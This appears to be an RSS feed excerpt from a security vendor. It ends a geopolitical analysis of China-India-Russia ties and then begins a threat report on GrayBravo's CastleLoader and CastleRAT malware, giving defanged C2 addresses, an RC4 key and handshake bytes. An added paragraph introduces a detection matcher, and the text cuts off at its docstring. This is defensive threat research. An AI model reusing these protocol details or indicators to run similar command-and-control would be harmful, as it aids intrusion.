href="https://www.idsa.in/askanexpert/dattatreaya-nimbalkar-asked-why-has-indias-necklace-of-diamonds-strategy-in-the-indian-ocean-region-not-been-as-successful-compared-to-chinas-string-of-pearls-strategy">referred to</a> as a “string of pearls” strategy by analysts outside of China — as an <a href="https://timesofindia.indiatimes.com/blogs/everything-under-the-sun/india-vs-china-the-string-of-pearls-and-belt-road/">encirclement</a> of India in what New Delhi considers its regional maritime domain. 
This competition has played out at ports across the region. For example, in 2022, China and India <a href="https://direct.mit.edu/isec/article/47/3/174/114671/Correspondence-Debating-China-s-Use-of-Overseas">competed</a> to influence Sri Lanka’s decision regarding China’s request to dock a military vessel at the China-owned and operated Port of Hambantota; the ship ultimately <a href="https://www.reuters.com/world/asia-pacific/chinese-military-ship-leaves-sri-lanka-after-controversial-visit-2022-08-22/">called</a> at the port over New Delhi’s objections. In 2023, India <a href="https://thediplomat.com/2023/11/what-swirls-beneath-research-activity-of-chinese-ships-in-the-indian-ocean/">objected</a> to the presence of a Chinese state-owned research vessel, which China very likely uses to <a href="https://features.csis.org/hiddenreach/china-indian-ocean-research-vessels/">support</a> PLA <a href="https://digital-commons.usnwc.edu/cmsi-maritime-reports/3/">requirements</a>. In support of their territorial claims and very likely to facilitate military contingencies, China and India have worked to <a href="https://chinapower.csis.org/analysis/china-upgrading-dual-use-xiaokang-villages-india-border/">build out</a> relevant <a href="https://southasianvoices.org/sec-f-in-n-sino-indian-renewable-competition-3-18-2025/">infrastructure</a> along disputed border areas.</p>
        <p>Finally, China likely views New Delhi’s joint military exercises with third parties as evidence that India is preparing for a China contingency. In 2022, an annual <a href="https://thediplomat.com/2022/11/india-us-armies-hold-exercises-close-to-disputed-china-border/">exercise</a> with the US took place just 62 miles from a disputed border area. In 2024, India <a href="https://www.thehindu.com/news/national/iafs-largest-multilateral-exercise-tarang-shakti-to-see-participation-of-over-150-aircraft/article68469453.ece">organized</a> the first Tarang Shakti air combat exercise that involved ten countries, including the US. In 2025, India and the Philippines <a href="https://www.aljazeera.com/news/2025/8/4/philippines-india-hold-first-joint-naval-drill-in-disputed-south-china-sea">conducted</a> a joint naval drill in the South China Sea. India almost certainly views China’s military <a href="https://www.orfonline.org/research/how-china-and-pakistan-work-against-india">cooperation and integration</a> with Pakistan –– including China’s role as Islamabad’s main supplier of arms –– as a grave threat to Indian security. China is <a href="https://www.sipri.org/sites/default/files/2025-03/fs_2503_at_2024_0.pdf">responsible</a> for 81% of Pakistan’s arms imports.</p>
        <h3>India-Russia Relationship: Longstanding and Rooted in Arms Sales and Trade</h3>
        <p>India and Russia have had a close partnership since at least the 1950s, very likely anchored by a mutual desire to push back against perceived US hegemony, Russian arms sales to India, and, more recently, an increase in Indian purchases of Russian oil. In 2010 and <a href="https://www.mea.gov.in/bilateral-documents.htm?dtl%2F37940%2FJoint+Statement+following+the+22nd+IndiaRussia+Annual+Summit">2024</a>, India and Russia <a href="https://www.mea.gov.in/portal/countryquicklink/597_russia_january_2014.pdf">defined</a> their relationship as a “Special and Privileged Partnership.” Following a July 2024 summit, Modi and Putin <a href="https://www.mea.gov.in/bilateral-documents.htm?dtl%2F37940%2FJoint+Statement+following+the+22nd+IndiaRussia+Annual+Summit">issued</a> a statement calling the India-Russia partnership a “time-tested relationship which is based on trust, mutual understanding and strategic convergence.”</p>
        <h4>Political Dynamics</h4>
        <p>India and Russia’s political partnership very likely dates back to at least the 1950s, when the Soviet Union used its UN veto to <a href="https://research.un.org/en/docs/sc/quick">support</a> India’s claims on Kashmir, and is anchored by a shared strategic interest in re-balancing post-Cold War US hegemony in favor of a multipolar world order. New Delhi has <a href="https://research.un.org/en/docs/sc/quick">called</a> Moscow “key to India’s quest for a stable Asian balance of power.” However, India and Russia’s visions for what a multipolar world looks like very likely differ. India’s principle of multi-alignment aims to <a href="https://economictimes.indiatimes.com/news/india/india-is-non-west-but-not-anti-west-jaishankar/articleshow/106531511.cms?from=mdr">reform</a> global power dynamics and is not anti-West, in contrast to Russia’s goal of <a href="https://direct.mit.edu/isec/article/49/3/50/128035/Quo-Vadis-Russian-Deterrence-Strategic-Culture-and">ushering</a> in a world in which Russia, China, and the US are on equal footing. Indian Foreign Minister Subrahmanyam Jaishankar has <a href="https://economictimes.indiatimes.com/news/india/india-is-non-west-but-not-anti-west-jaishankar/articleshow/106531511.cms?from=mdr">articulated</a> that India’s “non-West” character does not mean it is “anti-West.” Jaishankar’s book on India’s foreign policy, <em>Why Bharat Matters</em>, <a href="https://www.academia.edu/116195958/Why_Bharat_Matters_2024_">asserts</a> that India’s approach that distanced itself from the West “has led [India] to develop dependencies elsewhere” — yet specifically asserts that India “must realize that there is little profit in being anti-West.”</p>
        <p>India’s diplomatic approach to Russia suggests it is willing to occasionally compromise on its <a href="https://theloop.ecpr.eu/indias-sovereignty-paradox-neutrality-oil-and-the-price-of-multi-alignment/">declared</a> neutral, non-aligned strategy. India <a href="https://web.archive.org/web/20230227221317/https://economictimes.indiatimes.com/news/india/are-we-anywhere-near-a-possible-solution-acceptable-to-both-sides-india-abstains-in-unga-on-ukraine-resolution/articleshow/98194298.cms">abstained</a> on multiple UN resolutions relating to Russia’s invasion and Ukraine’s sovereignty, has not taken a condemnatory stance against Russia’s invasion of Ukraine, and consistently <a href="https://www.mea.gov.in/bilateral-documents.htm?dtl/38214/IndiaUkraine_Joint_Statement_on_the_Visit_of_Prime_Minister_of_India_to_Ukraine#:~:text=The%20Indian%20side%20reiterated%20its,%2C%20Switzerland%2C%20in%20June%202024.">calls</a> for a “peaceful resolution through dialogue and diplomacy.” Modi and Putin have publicly <a href="https://timesofindia.indiatimes.com/india/putin-dials-modi-pm-thanks-friend-for-bday-wishes-india-ready-to-help-in-ukraine-peace-efforts/articleshow/123946697.cms">maintained</a> a warm friendship despite US and European criticism of Russia, and Modi has <a href="https://www.theguardian.com/world/article/2024/jul/09/modi-putin-summit-bonds-of-friendship-ukraine-tensions">referred</a> to Russia as India’s “all-weather friend and trusted ally.”</p>
        <h4>Economic Dynamics</h4>
        <p>Russia very likely views India as a critical, longstanding market for Russian weapons and, increasingly since Russia’s full-scale invasion of Ukraine in 2022, an economic partner that helps Russia recoup revenue lost due to Western sanctions. India’s import of crude oil from Russia increased from $2.3 billion in 2021 to $52.7 billion in 2024, despite Western sanctions on Russia. India’s Ministry of External Affairs has <a href="https://www.mea.gov.in/response-to-queries.htm?dtl%2F39812%2FOfficial_Spokespersons_response_to_media_queries_regarding_recent_EU_sanctions_July_18_2025">stated</a> that India “does not subscribe to any unilateral sanctions measures,” and “considers the provision of energy security a responsibility of paramount importance to meet the basic needs of its citizens.” Since 2023, Russia <a href="https://www.reuters.com/markets/commodities/russia-squeezes-mideast-opec-shares-indias-oil-market-historic-lows-2024-04-19">has been</a> India’s top supplier of crude oil, and Russian oil <a href="https://oilprice.com/Energy/Energy-General/Disregarding-US-Sanctions-India-Continues-to-Buy-Russian-Crude.html">exceeded</a> 40% of India’s overall crude imports by May 2025. As a result, India is now the second-largest purchaser of Russian crude oil after China. Discounted Russian oil has fueled India’s surging energy needs and <a href="https://oec.world/en/profile/bilateral-product/refined-petroleum/reporter/ind">enabled</a> it to become the third-largest exporter of refined petroleum products, which is India’s most exported product. Even after US President Donald Trump imposed a 50% tariff on India to dissuade it from continuing to buy Russian oil, Indian oil imports <a href="https://indianexpress.com/article/business/indias-russian-oil-imports-robust-in-sept-so-far-crude-loadings-from-ports-stable-10254256/">remained</a> steady in the first half of September 2025. 
The US subsequently <a href="https://home.treasury.gov/news/press-releases/sb0290">imposed</a> sanctions on Russian oil exporters Lukoil and Rosneft on October 22, 2025, prompting Indian refiners to <a href="https://www.reuters.com/business/energy/indian-refiners-await-clarity-new-russian-oil-orders-2025-10-28/">pause</a> new orders and seek alternatives for sanctioned Russian oil. On October 28, an India-bound tanker carrying Russian crude <a href="https://timesofindia.indiatimes.com/business/india-business/sign-of-oil-trade-disruption-after-trump-sanctions-russian-crude-oil-tanker-headed-for-india-takes-a-u-turn-now-idling-in-baltic-sea/articleshow/124897820.cms">turned around</a> in the Baltic Sea — an incident that oil analysts <a href="https://oilprice.com/Latest-Energy-News/World-News/Russian-Oil-Tanker-Turns-Back-Under-US-Sanctions-Threat.html">attributed</a> to the US sanctions pressure. However, Indian Oil <a href="https://www.reuters.com/business/energy/indian-oil-buys-russian-crude-non-sanctioned-entities-sources-say-2025-10-31/">continued</a> to purchase Russian crude from non-sanctioned entities, suggesting the US sanctions are likely to impact, but not halt, India’s imports from Russia.</p>
        <p>Total trade between India and Russia <a href="https://ibef.org/indian-exports/india-russia-trade">amounted</a> to $68.7 billion in FY2025, likely <a href="https://www.orfonline.org/expert-speak/a-deep-dive-into-the-india-russia-economic-relations">surging</a> as a result of the vacuum left by Western firms. However, India’s imports from Russia account for $63.8 billion, over 90% of the total trade, reflecting a significant trade imbalance. Even so, New Delhi <a href="https://timesofindia.indiatimes.com/india/trade-deficit-rising-due-to-oil-buy-need-to-address-it-eam-in-russia/articleshow/123418117.cms">aims</a> to achieve $100 billion in trade with Russia by 2030. Both countries seek to <a href="https://timesofindia.indiatimes.com/business/india-business/rupee-rouble-rule-what-rbi-move-means-for-russia-trade/articleshow/123269562.cms">reduce</a> reliance on the US dollar, and 90% of trade is now <a href="https://m.economictimes.com/news/economy/foreign-trade/rupee-rouble-rule-rbi-clears-path-for-faster-india-russia-payments/articleshow/123277090.cms">settled</a> in ruble-rupee transactions. However, India’s trade with the West will likely <a href="https://indianexpress.com/article/business/banking-and-finance/as-russia-seeks-to-expand-trade-in-rupee-rouble-rbi-sebi-remain-wary-9608947/">complicate</a> financial integration; India has been <a href="https://www.theweek.in/news/india/2024/12/03/india-finance-ministry-parliament-response-new-brics-currency-payment-system.html">hesitant</a> to adopt sanctions-resistant payment networks with Russia and has <a href="https://economictimes.indiatimes.com/news/india/india-seeks-rupees-global-reach-but-no-plan-to-replace-us-dollar-eam-s-jaishankar/articleshow/118747922.cms?from=mdr">dismissed</a> the idea of replacing the US dollar.</p>
        <h4>Military Dynamics</h4>
        <p>We assess that India and Russia’s military relationship is <a href="https://warontherocks.com/2025/09/guns-oil-and-dependence-can-the-russo-indian-partnership-be-torpedoed/">centered</a> on Russia’s long history of exporting weapons to India, which has created an Indian dependence on Russian systems. Over the past twenty years, India has <a href="https://warontherocks.com/2025/04/friends-with-limits-the-future-of-russo-indian-defense-ties/">purchased</a> roughly $60 billion in Russian weapons, amounting to 65% of its total weapons imports. India’s purchases <a href="https://www.thedefensenews.com/news-details/Russia-Offers-S-400-Tech-Transfer-to-India--Local-Manufacturing-of-S-400-Components/">include</a> Russia’s S-400 missile defense system, which India <a href="https://www.ndtv.com/india-news/pak-missile-attack-india-15-cities-targeted-india-uses-harpy-drones-s-400-missile-defence-system-to-counter-pak-attack-8362473">used</a> in May 2025 to repel Pakistani missile attacks. India and Russia have also <a href="https://www.cna.org/reports/2025/08/Russia-India-Relations-Multipolarity-in-Practice.pdf">pursued</a> joint production of weapons, including T-90 tanks and Su-30MKI aircraft. India-Russia military cooperation has <a href="https://www.cna.org/reports/2025/08/Russia-India-Relations-Multipolarity-in-Practice.pdf">stagnated</a> on other fronts, such as joint training and exercises.</p>
        <p>Although Moscow <a href="https://www.newindianexpress.com/nation/2025/Mar/11/russia-remains-top-arms-supplier-to-india-sipri-report">continues to be</a> India’s main arms supplier, India’s arms purchases from Russia have declined since 2024, as India has <a href="https://idrw.org/pressure-mounts-on-russia-to-offer-niche-military-supplies-to-india-amid-push-for-reduced-dependency/">sought</a> to <a href="https://www.business-standard.com/external-affairs-defence-security/news/india-looks-west-for-cutting-edge-weapons-to-reduce-reliance-on-russia-124120300498_1.html">reduce</a> its reliance on Russia and increasingly purchase from Western suppliers, including France, Israel, and the US. On October 31, 2025, India and the US <a href="https://timesofindia.indiatimes.com/india/new-chapter-rajnath-singh-meets-us-secretary-of-war-pete-hegseth-signs-10-yr-defence-framework/articleshow/124985959.cms">signed</a> a ten-year Defense Framework Agreement, which Indian Defense Minister Rajnath Singh described as the start of a “new chapter” in India-US defense cooperation and “a signal of our growing strategic convergence.” This agreement likely reflects India’s intent to continue diversifying its military cooperation and arms trade beyond Russia, and shore up its US partnership amid tariff-related strife — further reinforcing the multi-alignment doctrine driving India’s security calculations and reducing the likelihood of a Russia-India-China military alliance.</p>
        <p>The <a href="https://www.rand.org/pubs/commentary/2024/08/something-is-rotten-in-the-state-of-russian-arms-industry.html">documented</a> poor performance of Russian weapons systems in Ukraine likely impacts India’s calculus. A leak by hacker collective “Black Mirror” <a href="https://defencesecurityasia.com/en/india-mig29k-radar-leak-russia-zhukme-blackmirror/">revealed</a> internal documents from Russia’s state-owned defense conglomerate Rostec <a href="https://militarnyi.com/en/news/russian-zhuk-me-radar-undermined-combat-capability-of-indian-mig-29s/">detailing</a> how the Russian-manufactured radar system installed in India’s MiG-29K fighter aircraft suffered extensive and systemic failures between 2016 and 2019; this lack of reliability likely encouraged India’s move away from Russian weapons.</p>
        <h2>State of the Nascent Trilateral Dynamic and Indicators of Deepening Trilateral Cooperation</h2>
        <p>China, India, and Russia have not declared a formal bloc; instead, in recent months, the three states have taken primarily diplomatic steps to project increased interest in trilateral engagement –– most notably a meeting between Modi, Putin, and Xi at the 2025 SCO Summit. Though the three states did not make any concrete commitments at the summit, the meeting represents the first time all three leaders have met in person since 2019, and very likely reflects an effort by Russia and China to exploit strains in the US-India relationship to draw India away from the US.</p>
        <p>Past trilateral engagement, which has primarily occurred at multilateral fora such as BRICS, SCO, and G20 Summits, has not resulted in a solidified, institutionalized trilateral bloc due to divergent national interests that will likely pose a long-term structural impediment. These strategic differences will likely persist and continue to limit the depth and breadth of alignment among the three countries, making it less likely that a solidified trilateral bloc will emerge in the short term. The three primary multilateral fora where trilateral engagement –– short of formation of a bloc –– has occurred are the now-dormant RIC format, BRICS, and the SCO.</p>
        <h4>RIC Format: Dormant, Though Russia and China Are Interested in Reviving It</h4>
        <p>The RIC format is likely the multilateral forum in which trilateral engagement would primarily take place, given the apparent interest of Beijing and Moscow in reviving the dormant discussion format and New Delhi’s apparent reserved openness to the possibility. The RIC format, which began formally in 2007 and involves trilateral discussions among the foreign ministers of these countries, has been inactive since late 2021.</p>
        <p>Between 2002 and 2020, twenty trilateral ministerial-level <a href="https://www.firstpost.com/explainers/russia-india-china-ric-troika-revival-explained-13908388.html">meetings</a> occurred, covering topics such as trade, energy, and disaster management. At the most recent RIC foreign ministers <a href="https://web.archive.org/web/20211127014320/https://www.mea.gov.in/bilateral-documents.htm?dtl/34540/joint+communique+of+the+18th+meeting+of+the+foreign+ministers+of+the+russian+federation+the+republic+of+india+and+the+peoples+republic+of+china">meeting</a> in November 2021, the three countries expressed interest in regular high-level meetings, reiterated the importance of international reform for a multipolar and rebalanced world, and opposed unilateral sanctions imposed outside of the UNSC.</p>
        <p>In a 2022 joint statement, China and Russia <a href="https://www.airuniversity.af.edu/Portals/10/CASI/documents/Translations/2022-02-04%20China%20Russia%20joint%20statement%20International%20Relations%20Entering%20a%20New%20Era.pdf">declared</a> their intent to develop cooperation within the RIC format, a sentiment Russian Foreign Minister Sergey Lavrov <a href="https://thediplomat.com/2025/07/is-the-russia-india-china-troika-making-a-comeback/">reiterated</a> in May 2025. In July 2025, an Indian government spokesperson neither rejected nor explicitly supported the revival of the RIC format, likely <a href="https://web.archive.org/web/20250925171754/https://www.mea.gov.in/media-briefings.htm?dtl/39809/Transcript_of_Weekly_Media_Briefing_by_the_Official_Spokesperson_July_17_2025">indicating</a> India’s reserved openness to it.</p>
        <h4>BRICS: Ill-Equipped to Institutionalize Trilateral Engagement, Though Opportunities Remain for Economic Engagement</h4>
        <p>The BRICS (Brazil, Russia, India, China, and South Africa) bloc is active, though very likely ill-equipped to facilitate the institutionalization of a trilateral Russia-India-China bloc due to its status as an informal coordinating body, as opposed to an organization that requires mutual commitments. BRICS was formed in 2009 and is an organization <a href="http://www.brics.utoronto.ca/docs/090616-leaders.html">committed</a> to perpetuating a multipolar world via political, security, and economic cooperation.</p>
        <p>Though Russia and China have <a href="https://www.usip.org/publications/2024/10/whats-driving-bigger-brics-and-what-does-it-mean-us">sought</a> to make BRICS a geostrategic bloc to rival the West, the organization does not bind its member states to any treaty, alliance, or formal legal structure, thereby limiting the organization’s ability to institutionalize a geostrategic bloc. India <a href="https://www.isas.nus.edu.sg/papers/indias-role-in-the-brics-navigating-the-balance-in-a-changing-world/#_ftnref8">views</a> the forum as a key balancing factor in its nuanced multi-alignment strategy, in which New Delhi seeks to position itself as a bridge between Western and non-Western fora.</p>
        <p>Despite the overall limitations of the BRICS structure, the connectivity it provides for financial institutions likely raises the possibility of BRICS facilitating trilateral economic integration, should China, India, and Russia choose to pursue that sort of cooperation. BRICS has established two financial institutions, both of which are <a href="https://researchbriefings.files.parliament.uk/documents/CBP-10136/CBP-10136.pdf">based</a> on foundational treaties. The New Development Bank (NDB) <a href="https://www.ndb.int/wp-content/uploads/2022/07/NDB_StrategyDocument_Eversion-1.pdf">supports</a> collaborative development projects in emerging markets and developing countries, and the Contingent Reserve Arrangement ensures BRICS’s central banks provide mutual support during a currency crisis. BRICS’s interconnected financial systems could facilitate trilateral economic activity and offer a way for the three countries to conduct trade payments.</p>
        <p>We assess that BRICS could also facilitate Russia and China’s <a href="https://carnegieendowment.org/research/2023/12/the-difficult-realities-of-the-brics-dedollarization-effortsand-the-renminbis-role?lang=en">efforts</a> to develop alternatives to the US dollar, though India’s <a href="https://www.indiatoday.in/india-today-insight/story/as-brics-debates-reducing-dollar-dependence-why-india-is-walking-a-fine-line-2753797-2025-07-10">hesitation</a> to aggressively push for de-dollarization likely limits the extent to which de-dollarization will become an area for trilateral engagement. BRICS nations have <a href="https://responsiblestatecraft.org/dedollarization-china-russia/">explored</a> the development of a common currency and have specifically <a href="https://www.thenationalnews.com/business/2025/07/13/brics-brazil-china-us/">created</a> a cross-border digital payment and messaging system backed by cryptocurrency, <a href="https://www.brics-pay.com/">called</a> BRICS Pay. During the July 2025 BRICS summit in Rio de Janeiro, Brazil, member countries reportedly made progress in “<a href="https://dirco.gov.za/wp-content/uploads/2025/07/2025.07.05.-BRICS-Leaders-Declaration.pdf">identifying</a> possible pathways to support the continuation of discussions on the potential for greater interoperability of BRICS payment systems.”</p>
        <h4>Shanghai Cooperation Organization (SCO): Encumbered by Competing Interests</h4>
        <p>Despite the fact that Russia, India, and China’s latest trilateral engagement took place at the SCO <a href="https://www.cgtn.com/specials/2025/sco-summit-.html">Summit</a> in 2025, the SCO is unlikely to facilitate a deeper trilateral relationship, as it is encumbered by competing interests. The SCO was founded in 2001 to <a href="https://www.iiss.org/publications/strategic-comments/2018/shanghai-cooperation-organisation/">focus</a> on border security and ethnic minority separatism in China’s Xinjiang region, though it has since <a href="https://web.archive.org/web/20231128043631/https://eng.sectsco.org/20231127/1168690.html">expanded</a> to encompass counter-drug trafficking efforts, coordination in support of economic development, wider security-relevant matters, and other activities. India <a href="https://web.archive.org/web/20211108024435/https://eoibeijing.gov.in/eoibejing_pages/NDc,">joined</a> in 2017, after being an observer since 2005, with Russia’s support and possibly <a href="https://archive.ph/k5ehF">without</a> China’s, as Beijing sponsored Pakistan’s membership that same year.</p>
        <p>China and Russia have used the SCO to advance their geopolitical aims, including <a href="https://web.archive.org/web/20250509070130/https://www.gov.cn/yaowen/liebiao/202505/content_7023051.htm">shaping</a> future multipolarism and <a href="https://www.uscc.gov/sites/default/files/2020-11/Shanghai_Cooperation_Organization-Testbed_for_Chinese_Power_Projection.pdf">projecting</a> power. In particular, China uses the SCO as a foundation for <a href="https://carnegieendowment.org/research/2025/08/a-new-world-cop-on-the-beat-chinas-internal-security-outreach-under-the-global-security-initiative?lang=en">expanding</a> an international security architecture that is consistent with the CCP’s regime security.</p>
        <p>We assess that the SCO’s institutional capacity to take unified action is limited, in part by the fact that its members are not consistently <a href="https://merics.org/en/comment/china-and-russia-are-using-shanghai-cooperation-organization-push-alternative-global-order">aligned</a>. For example, India initially did not <a href="https://web.archive.org/web/20250616091522/https://www.mea.gov.in/Speeches-Statements.htm?dtl/39670/Statement+on+the+Shanghai+Cooperation+Organization+SCO">participate</a> in crafting an SCO statement criticizing Israeli and US strikes against Iran in June 2025, although it later <a href="https://thewire.in/diplomacy/after-june-rebuff-india-backs-sco-statement-condemning-israeli-us-strikes-on-iran">joined</a> a different SCO statement condemning the same activities. The SCO did not stop China-India border clashes in 2020, although it helped <a href="https://jamestown.org/program/the-shanghai-cooperation-organizations-limited-role-in-easing-tensions-between-china-and-india/">facilitate</a> bilateral discussions. Following the 2025 clashes between India and Pakistan, India reportedly <a href="https://www.euronews.com/2025/06/26/india-rejects-shanghai-cooperation-organisation-statement-over-claims-it-favoured-pakistan">objected</a> to an SCO statement it viewed as undermining its own position. According to one Chinese think tank director, India is <a href="https://web.archive.org/web/20250819022442/https://thechinaacademy.org/india-as-the-scos-troubled-guest/">using</a> the SCO to contain China’s influence and push back on its development and security initiatives, such as the BRI.</p>
        <h4>Indicators of Deeper Trilateral Cooperation</h4>
        <p>The table below highlights potential indicators of increasing trilateral cooperation in the future, as well as the factors most likely limiting trilateral cooperation today and going forward. China-India tension is very likely the primary constraint to the development of a trilateral bloc.</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1cac80654eeccc9254abd0ff29dc936da6d1b0a7f.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[GrayBravo’s CastleLoader Activity Clusters Target Multiple Industries]]></title>
            <link>https://www.recordedfuture.com/ko/research/graybravos-castleloader-activity-clusters-target-multiple-industries</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/graybravos-castleloader-activity-clusters-target-multiple-industries</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[
        <p><em>Note: The analysis cut-off date for this report was November 10, 2025</em></p>
        <h2>Executive Summary</h2>
        <p>Insikt Group continues to monitor GrayBravo (formerly tracked as TAG-150), a technically sophisticated and rapidly evolving threat actor first identified in September 2025. GrayBravo demonstrates strong adaptability and responsiveness to public exposure, and operates a large-scale, multi-layered infrastructure. Recent analysis of GrayBravo’s ecosystem uncovered four distinct activity clusters leveraging the group’s CastleLoader malware, each defined by unique tactics, techniques, and victim profiles. These findings reinforce the assessment that GrayBravo operates a malware-as-a-service (MaaS) model.</p>
        <p>For example, one cluster, tracked as TAG-160, impersonates global logistics firms, using phishing lures and the ClickFix technique to distribute CastleLoader while spoofing legitimate emails and exploiting freight-matching platforms to target victims. Another cluster, tracked as TAG-161, impersonates Booking.com, also employing ClickFix to deliver CastleLoader and Matanbuchus, and uses novel phishing email management tools. Further investigation through historical panel analysis linked the online persona “Sparja”, a user active on Exploit Forums, to potential GrayBravo-associated activities, based on the alias’s distinctiveness and related discussion topics.</p>
        <p>To protect against GrayBravo, security defenders should block IP addresses and domains tied to associated loaders, infostealers, and remote access trojans (RATs), flag and potentially block connections to unusual legitimate internet services (LISs) such as Pastebin, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the <strong>Mitigations</strong> section for implementation guidance and <strong>Appendix H</strong> for a complete list of indicators of compromise (IoCs).</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Insikt Group uncovered four distinct activity clusters leveraging GrayBravo’s CastleLoader, each exhibiting unique tactics, techniques, and procedures (TTPs) and victim profiles, reinforcing the assessment that GrayBravo operates a malware-as-a-service (MaaS) ecosystem, as previously hypothesized.</li>
          <li>One cluster, tracked as TAG-160, impersonates logistics firms and deploys phishing lures combined with the ClickFix technique to distribute CastleLoader, while spoofing legitimate emails and abusing freight-matching platforms to engage targets.</li>
          <li>Cluster 2, tracked as TAG-161, impersonates Booking.com and uses ClickFix techniques to deliver CastleLoader and Matanbuchus, relying on threat actor-controlled infrastructure and employing previously unseen phishing email management tooling.</li>
        </ul>
        <h2>Background</h2>
        <p>In September 2025, Insikt Group <a href="https://www.recordedfuture.com/ko/research/from-castleloader-to-castlerat-tag-150-advances-operations">reported</a> on a newly identified threat actor, TAG-150, assessed to have been active since at least March 2025. Since our previous reporting, we have decided to classify TAG-150 as GrayBravo. It is believed to be responsible for developing multiple custom malware families, beginning with CastleLoader and CastleBot, and most recently, CastleRAT. It is characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure. Alongside the discovery of the previously undocumented remote access trojan CastleRAT, Insikt Group identified GrayBravo’s multi-tiered infrastructure and its use of various supporting services, including file-sharing platforms and anti-detection tools.</p>
        <p>Although public reporting has suggested that GrayBravo operates under a malware-as-a-service (MaaS) model, supported by its delivery of diverse second-stage payloads, the proliferation of CastleLoader administration panels, and features typical of MaaS platforms, Insikt Group has not identified any advertisements or discussions of this service on underground forums. Recorded Future® Network Intelligence indicates that GrayBravo predominantly interacts with its own infrastructure, with only a limited number of external IP addresses, possibly representing customers or affiliates, observed communicating with it. Many of these connections are routed through Tor nodes, complicating attribution and classification.</p>
        <p>Through continued monitoring, Insikt Group has identified multiple clusters of activity linked to GrayBravo, reinforcing the assessment that the threat actor is operating a MaaS ecosystem (see <strong>Figure 1</strong>). This report details the tactics, techniques, and procedures (TTPs) associated with these clusters, believed to represent potential GrayBravo customers or affiliates. More specifically, Insikt Group identified four clusters linked to GrayBravo’s CastleLoader activity: one targeting the logistics sector (TAG-160), another using Booking.com-themed lures across a wider range of victims (TAG-161), a third also impersonating Booking.com but independent from the previous group, and a fourth distributing CastleLoader through malvertising and fake software updates.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_16f04fa4d373e431d0057b87c0fe966769aa4cac9.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1206" />
        </p>
        <p><em><strong>Figure 1</strong>: Overview of GrayBravo and associated clusters (Source: Recorded Future)</em></p>
        <h2>Threat Analysis</h2>
        <h3>Higher Tier Infrastructure</h3>
        <p>Insikt Group previously identified an extensive, multi-tiered infrastructure tied to GrayBravo. The infrastructure consists of Tier 1 victim-facing C2 servers associated with malware families such as CastleLoader, SecTopRAT, WarmCookie, and the newly discovered CastleRAT, as well as Tier 2, Tier 3, and Tier 4 servers, the latter of which are likely used for backup purposes. <strong>Figure 2</strong> provides an overview of the infrastructure used by GrayBravo.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_135c5c1ab7869c6f3e602baab05488fd0d435962a.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="929" />
        </p>
        <p><em><strong>Figure 2</strong>: Multi-tiered infrastructure linked to GrayBravo (Source: Recorded Future)</em></p>
        <h3>CastleRAT</h3>
        <p>CastleRAT is a remote access trojan (RAT) observed in both C and Python variants that share several core characteristics. Each variant communicates through a custom binary protocol secured with RC4 encryption and hard-coded sixteen-byte keys. Upon execution, CastleRAT queries a geolocation application programming interface (API) using <em>ip-api[.]com</em> to obtain victim geographic location and network details. Both variants support remote command execution and file download and execution, and can establish an interactive remote shell. The C variant exhibits additional capabilities, including browser credential theft, keylogging, and screen capture functionality.</p>
        <h4>Infrastructure Analysis</h4>
        <p>Analysis of CastleRAT C-variant command-and-control (C2) infrastructure reveals notable operational overlap across multiple nodes sharing the RC4 key “NanuchkaUpyachka.” As illustrated in <strong>Figure 3</strong>, Insikt Group observed two CastleRAT C2 servers, <em>104[.]225[.]129[.]171</em> and <em>144[.]208[.]126[.]50</em>, maintain concurrent communications with at least three US-based victims, suggesting coordinated or redundant control channels. The overlapping traffic patterns, observed within the same daily collection windows, indicate that compromised hosts reached out to multiple C2s nearly simultaneously rather than migrating between them over time. This behavior implies a deliberate redundancy strategy employed by the threat actor. Additionally, direct communications between two CastleRAT C variants, <em>104[.]225[.]129[.]171</em> and <em>195[.]85[.]115[.]44</em>, further point to an interconnected infrastructure ecosystem rather than isolated C2 instances. Such internal connectivity could facilitate automated data synchronization, lateral control distribution, or key exchange mechanisms within the threat actor’s tooling, underscoring a more mature coordinated operational model than previously documented.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1d32a10bffa6e0b7534ef42d38aba5855ac9b6537.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="938" />
        </p>
        <p><em><strong>Figure 3</strong>: Victim communication with multiple CastleRAT C2 servers simultaneously (Source: Recorded Future)</em></p>
        <p>Notably, some CastleRAT samples <a href="https://tria.ge/250918-qj9pha1nz4/behavioral1">exhibit</a> behavior distinct from other observed variants by incorporating an elaborate handshake sequence and redundancy in their C2 communications. In these cases, the client’s initial request to the C2 server (for example, <em>77[.]238[.]241[.]203:443</em>) ends with the bytes <code>07 00 00 00</code> instead of the usual <code>01 00 00 00</code>, and the server responds with trailing bytes <code>9e ff 74 70</code> before closing the connection. A similar exchange occurs with <em>5[.]35[.]44[.]176</em>, after which the client reconnects to the first C2, transmitting only an encrypted sixteen-byte RC4 key and receiving trailing bytes <code>01 00 00 00</code> in response. The client then repeats this process with the second C2, sending <code>01 00 00 00</code> and receiving only the encrypted sixteen-byte RC4 key in return. This pattern suggests the use of additional handshake stages and dual-C2 redundancy mechanisms not seen in all CastleRAT samples.</p>
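        <p>The four-stage, dual-C2 exchange just described, written up as an added flow-level matcher that is not part of the report or of any Recorded Future tooling. It labels each connection by the trailer bytes quoted above and then looks for the sequence across one client’s connections. The C2 addresses are the two named above; the client address 10.0.0.5, the decoy server 203.0.113.9, the payload bytes, the stage labels and the sixteen-byte stand-in key are all constructed.</p>

```python
"""
Matcher for the extended CastleRAT handshake pattern described in the report.
Each Flow is one TCP connection reduced to the bytes sent in each direction,
the shape a sensor or pcap post-processor would hand to a detection rule.
"""
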